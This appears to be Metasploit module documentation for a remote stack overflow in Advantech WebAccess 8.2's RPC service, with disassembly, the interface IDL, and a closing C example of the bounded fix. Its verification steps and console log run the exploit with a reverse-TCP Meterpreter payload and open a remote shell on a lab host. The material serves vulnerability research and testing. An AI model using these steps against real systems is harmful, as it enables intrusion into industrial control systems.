## Vulnerable Application

[Advantech WebAccess <= 8.2](http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170330.exe)

## Vulnerability Analysis

The stack overflow happens in `sub_10004BC8`, where the caller's format string and arguments are passed to `vsprintf` with the fixed-size stack buffer `Dest` as the destination and no length check:

```
.text:10004BC8 ; int __cdecl sub_10004BC8(char *Format, char)
.text:10004BC8 sub_10004BC8    proc near               ;
.text:10004BC8                                         ;
.text:10004BC8
.text:10004BC8 lpWindowName    = dword ptr -818h
.text:10004BC8 hWnd            = dword ptr -814h
.text:10004BC8 lpClassName     = dword ptr -810h
.text:10004BC8 Args            = dword ptr -80Ch
.text:10004BC8 lpBaseAddress   = dword ptr -808h
.text:10004BC8 hFileMappingObject= dword ptr -804h
.text:10004BC8 Dest            = byte ptr -800h
.text:10004BC8 Format          = dword ptr  8
.text:10004BC8 arg_4           = byte ptr  0Ch
.text:10004BC8
.text:10004BC8                 push    ebp
.text:10004BC9                 mov     ebp, esp
.text:10004BCB                 sub     esp, 818h
.text:10004BD1                 mov     [ebp+lpWindowName], offset aDebugScreen1 ; "Debug Screen1"
.text:10004BDB                 mov     [ebp+lpClassName], offset aDebugwclass1 ; "debugWClass1"
.text:10004BE5                 lea     eax, [ebp+arg_4]
.text:10004BE8                 mov     [ebp+Args], eax
.text:10004BEE                 mov     ecx, [ebp+Args]
.text:10004BF4                 push    ecx             ; Args
.text:10004BF5                 mov     edx, [ebp+Format]
.text:10004BF8                 push    edx             ; Format
.text:10004BF9                 lea     eax, [ebp+Dest]
.text:10004BFF                 push    eax             ; Dest
.text:10004C00                 call    ds:vsprintf     ; overflow
```

The corresponding IDL is below:

```
[
  uuid(5d2b62aa-ee0a-4a95-91ae-b064fdb471fc),
  version(1.0)
]
interface target_interface
{
  /* opcode: 0x01, address: 0x00401260 */
  void sub_401260 (
    [in] handle_t arg_1,
    [in] long arg_2,
    [in] long arg_3,
    [in] long arg_4,
    [in][ref][size_is(arg_4)] char * arg_5,
    [out][ref] long * arg_6
  );
}
```

## Verification Steps

1. Start `msfconsole`
2. `use exploits/windows/scada/advantech_webaccess_webvrpcs_bof`
3. `set payload windows/meterpreter/reverse_tcp`
4. `set LHOST XXX.XXX.XXX.XXX`
5. `exploit`
6. **Verify** you get a connect-back Meterpreter session

## Options

None.
## Scenarios

```
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/advantech.rc
[*] Processing scripts/advantech.rc for ERB directives.
resource (scripts/advantech.rc)> use exploit/windows/scada/advantech_webaccess_webvrpcs_bof
resource (scripts/advantech.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (scripts/advantech.rc)> set RHOST 172.16.175.136
RHOST => 172.16.175.136
resource (scripts/advantech.rc)> set LHOST 172.16.175.1
LHOST => 172.16.175.1
resource (scripts/advantech.rc)> exploit
[*] Started reverse TCP handler on 172.16.175.1:4444
[*] 172.16.175.136:4592 - Binding to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ...
[*] 172.16.175.136:4592 - Bound to 5d2b62aa-ee0a-4a95-91ae-b064fdb471fc:1.0@ncacn_ip_tcp:172.16.175.136[4592] ...
[+] 172.16.175.136:4592 - Got a handle: 0x01ef2558
[*] 172.16.175.136:4592 - Trying target Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31...
[*] Sending stage (179779 bytes) to 172.16.175.136
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.136:49206) at 2017-12-11 11:32:15 -0600
[*] 172.16.175.136:4592 - The DCERPC service did not reply to our request

meterpreter > shell
Process 5208 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\WebAccess\Node>
```
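The `vsprintf` call in `sub_10004BC8` from the analysis above, reduced to its essential pattern beside a bounded replacement, as an added C example that is neither the product's code nor the module's: `DEST_SIZE` is taken from the listing (`Dest` at -800h, next local at -804h), while `format_unchecked`, `format_bounded` and the overlong sample input are assumptions made for illustration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Size of the Dest stack buffer in sub_10004BC8: Dest sits at -800h and
 * the next local (hFileMappingObject) at -804h. */
#define DEST_SIZE 0x800

/* The unchecked pattern from the disassembly: vsprintf writes the whole
 * formatted result into a fixed stack buffer, however long it is. */
int format_unchecked(char *dest, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int written = vsprintf(dest, fmt, ap);   /* no bound on dest */
    va_end(ap);
    return written;
}

/* Hardened form: vsnprintf never writes past dest_size, and a result that
 * would not have fit is reported as an error rather than truncated silently
 * (or, as above, written past the end of the buffer). Returns the length
 * written, -1 on a format error, -2 if the message was too long for dest. */
int format_bounded(char *dest, size_t dest_size, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int needed = vsnprintf(dest, dest_size, fmt, ap);
    va_end(ap);
    if (needed < 0)
        return -1;
    if ((size_t)needed >= dest_size) {
        dest[0] = '\0';                      /* do not pass partial data on */
        return -2;
    }
    return needed;
}

int main(void)
{
    char dest[DEST_SIZE];
    char big[DEST_SIZE + 0x100];             /* constructed overlong input */
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    format_unchecked(dest, "%s", "short message");   /* fits, so safe here */
    printf("bounded(short) = %d\n",
           format_bounded(dest, sizeof dest, "%s", "short message"));
    printf("bounded(big)   = %d\n", format_bounded(dest, sizeof dest, "%s", big));
    return 0;
}
```

The unchecked variant is only ever called with input that fits; handing it the overlong buffer is exactly the overflow the module triggers, which is why the bounded variant refuses such input instead.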